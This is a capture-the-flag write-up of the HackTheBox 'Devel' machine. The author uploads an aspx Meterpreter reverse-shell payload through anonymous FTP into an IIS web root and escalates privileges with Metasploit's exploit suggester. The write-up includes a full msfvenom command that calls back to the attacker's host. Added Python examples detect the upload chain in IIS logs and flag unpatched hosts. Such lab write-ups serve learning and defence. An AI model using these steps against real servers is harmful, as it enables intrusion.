Devel is a relatively quick and simple box that demonstrates the security risks of default program configurations. I would recommend this machine to any beginner wanting to learn more about penetration testing, as it introduces the fundamentals of port scanning and of using Metasploit to get both the user.txt and root.txt flags.
To get started on this machine we're going to be performing a fairly straightforward port scan with nmap:
nmap -sC -sV 10.10.10.5
-sC: equivalent to --script=default
-sV: probe open ports to determine service/version info
The first thing we notice is that port 21 is hosting an FTP server that allows anonymous login. This means our credentials to log in would be:
However, before logging in, let's check whether this FTP server's root directory is also the document root of the web server. This can be checked by browsing to any of the following links:
http://10.10.10.5/iisstart.htm
http://10.10.10.5/aspnet_client/
http://10.10.10.5/welcome.png
This confirms my suspicion that the FTP root is the web server's document root. So let's create a Meterpreter shell with a .aspx extension, since IIS will execute it when it is requested. There are a few cheat sheets online that I like to reference to quickly grab a full command. Once a payload is picked, it's time to run msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.43 LPORT=31337 -f aspx > notapayload.aspx
Before we upload this to the server we're going to set up a listener in metasploit:
So now let's login to the ftp server and see if we can upload our file:
Success! Now let's browse to the file we uploaded and we should see our meterpreter shell pop:
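The misconfiguration behind this step, an anonymous-writable FTP root that is also the IIS document root, leaves a clear trail in the server's own logs: an anonymous STOR of a script file followed shortly by an HTTP GET for the same name. The script below is an added example, not part of the original write-up, that correlates those two events from IIS W3C-format logs. The log lines are constructed (the host, client IP and file name are the ones from this write-up); the parser reads each log's own #Fields: header rather than assuming fixed columns, so it works on other IIS field selections as well. The set of script extensions and the one-hour correlation window are assumptions.

```python
"""Correlate anonymous FTP uploads of web-executable files with later HTTP requests
for the same file (the chain that an FTP root shared with the IIS web root exposes).
Added example, not from the original write-up; all log lines are constructed."""
from datetime import datetime

# Extensions IIS hands to a script engine instead of serving as static content (assumed set).
WEB_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx"}

# Constructed Microsoft FTP Service log in W3C format (field layout follows IIS defaults).
FTP_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem sc-status sc-win32-status sc-substatus x-session x-fullpath
2024-01-01 10:00:02 10.10.14.43 - 10.10.10.5 21 USER anonymous 331 0 0 0f0f /
2024-01-01 10:00:03 10.10.14.43 anonymous 10.10.10.5 21 PASS *** 230 0 0 0f0f /
2024-01-01 10:00:10 10.10.14.43 anonymous 10.10.10.5 21 STOR welcome.png 226 0 0 0f0f /welcome.png
2024-01-01 10:00:15 10.10.14.43 anonymous 10.10.10.5 21 STOR notapayload.aspx 226 0 0 0f0f /notapayload.aspx
"""

# Constructed IIS web log in W3C format for the same host.
HTTP_LOG = """\
#Software: Microsoft Internet Information Services
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-01-01 10:00:20 10.10.10.5 GET /iisstart.htm - 80 - 10.10.14.43 Mozilla/5.0 200 0 0
2024-01-01 10:00:31 10.10.10.5 GET /notapayload.aspx - 80 - 10.10.14.43 Mozilla/5.0 200 0 0
"""


def parse_w3c(text):
    """Yield one dict per record, keyed by the most recent '#Fields:' header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        # W3C logs encode embedded spaces as '+', so whitespace splitting is safe.
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # record does not match the declared header; skip it
        rec = dict(zip(fields, values))
        rec["ts"] = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        yield rec


def is_web_executable(name):
    """True if the file name carries an extension IIS would execute."""
    dot = name.rfind(".")
    return dot != -1 and name[dot:].lower() in WEB_EXECUTABLE


def correlate_uploads(ftp_text, http_text, window_seconds=3600):
    """Return one finding per successful anonymous STOR of a script file that is
    followed, within window_seconds, by an HTTP request for the same file name."""
    uploads = [r for r in parse_w3c(ftp_text)
               if r["cs-method"] == "STOR"
               and r["cs-username"].lower() == "anonymous"
               and r["sc-status"].startswith("2")        # 2xx: transfer completed
               and is_web_executable(r["cs-uri-stem"])]
    requests = list(parse_w3c(http_text))
    findings = []
    for up in uploads:
        name = up["cs-uri-stem"].rsplit("/", 1)[-1]
        for req in requests:
            delta = (req["ts"] - up["ts"]).total_seconds()
            if req["cs-uri-stem"].rsplit("/", 1)[-1] == name and 0 <= delta <= window_seconds:
                findings.append({"file": name,
                                 "uploader": up["c-ip"],
                                 "requester": req["c-ip"],
                                 "seconds_after_upload": delta,
                                 "http_status": req["sc-status"]})
    return findings


if __name__ == "__main__":
    for finding in correlate_uploads(FTP_LOG, HTTP_LOG):
        print(finding)
```

On the constructed logs the benign welcome.png upload produces nothing, while notapayload.aspx is reported with the uploading and requesting client addresses and the 16-second gap between STOR and GET. The same rule makes a reasonable SIEM correlation, and the underlying fix is to keep the FTP root out of the web root (or deny anonymous write access, and block script execution on any upload directory).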
Awesome. Let's check who we are real fast:
Okay that's some good information. However, when browsing to try and obtain the user.txt flag I experienced this:
That sucks. But we do have a meterpreter shell... Let's see if we can just run getsystem:
Well it was worth a shot. Let's perform some more enumeration to try and find a foothold. For this I'm just going to pop back into a local shell and run systeminfo:
This gives us a lot of information. The most important parts are that we're dealing with an X86-based PC and that no hotfixes have been applied to the system, so a known local exploit may well exist for it. Let's background our meterpreter session and try running local_exploit_suggester:
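The two facts pulled out of systeminfo above, the architecture and the absence of any hotfixes, are exactly what a patch audit should flag before an attacker gets to read them. The following script is an added example, not part of the original write-up, that parses systeminfo output (including its indented continuation lines) and reports those two conditions. Both samples are constructed to mimic the layout of systeminfo; the host names, build numbers and KB identifiers are placeholders, not Devel's real output.

```python
"""Parse 'systeminfo' output and flag a 32-bit (X86-based) system and a missing
hotfix list.  Added example, not from the original write-up; both samples below
are constructed placeholders in systeminfo's layout."""
import re

SAMPLE_UNPATCHED = """\
Host Name:                 EXAMPLE-HOST
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7600 N/A Build 7600
System Type:               X86-based PC
Hotfix(s):                 N/A
Network Card(s):           1 NIC(s) Installed.
                           [01]: Example Adapter
"""

SAMPLE_PATCHED = """\
Host Name:                 EXAMPLE-HOST2
OS Name:                   Microsoft Windows 7 Enterprise
OS Version:                6.1.7601 Service Pack 1 Build 7601
System Type:               x64-based PC
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB0000001
                           [02]: KB0000002
                           [03]: KB0000003
"""


def parse_systeminfo(text):
    """Return {field: value}; indented continuation lines are appended to the previous field."""
    info, last = {}, None
    for line in text.splitlines():
        if not line.strip():
            continue
        if line[0].isspace() and last is not None:
            info[last] += "\n" + line.strip()      # e.g. the '[01]: KB...' lines under Hotfix(s)
        else:
            key, _, value = line.partition(":")     # split on the first colon only
            last = key.strip()
            info[last] = value.strip()
    return info


def audit(text):
    """Summarise patch state and architecture, with a list of findings worth acting on."""
    info = parse_systeminfo(text)
    hotfix_field = info.get("Hotfix(s)", "")
    count_match = re.match(r"(\d+)\s+Hotfix", hotfix_field)   # 'N/A' yields no match -> 0
    count = int(count_match.group(1)) if count_match else 0
    kbs = re.findall(r"\[\d+\]:\s*(KB\d+)", hotfix_field)
    arch_match = re.match(r"(x86|x64|arm64)", info.get("System Type", ""), re.IGNORECASE)
    arch = arch_match.group(1).lower() if arch_match else "unknown"
    findings = []
    if count == 0:
        findings.append("no hotfixes installed")
    if arch == "x86":
        findings.append("32-bit OS")
    return {"host": info.get("Host Name"), "os": info.get("OS Name"),
            "version": info.get("OS Version"), "arch": arch,
            "hotfix_count": count, "hotfixes": kbs, "findings": findings}


if __name__ == "__main__":
    for sample in (SAMPLE_UNPATCHED, SAMPLE_PATCHED):
        print(audit(sample))
```

Run against real output (systeminfo > host.txt, then audit(open("host.txt").read())) the hotfix list can be compared with a baseline of required updates; a host reporting N/A or an empty list is the one to patch or isolate first.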
We've got a load of exploits to try on this system. Let's start testing them:
One down (and my session died). However, once I've popped a new session and configured my options:
Let's check who we are:
Now that's the good stuff. We should be able to go and grab both flags now:
And just like that - we've completed the machine.
I'm slowly working my way through the retired machines since I was inactive on HackTheBox for a while. I thought that this machine was pretty straightforward: Devel perfectly serves its purpose as a beginner's box. It required some basic enumeration skills, as well as some basic Metasploit knowledge.
Thanks for reading!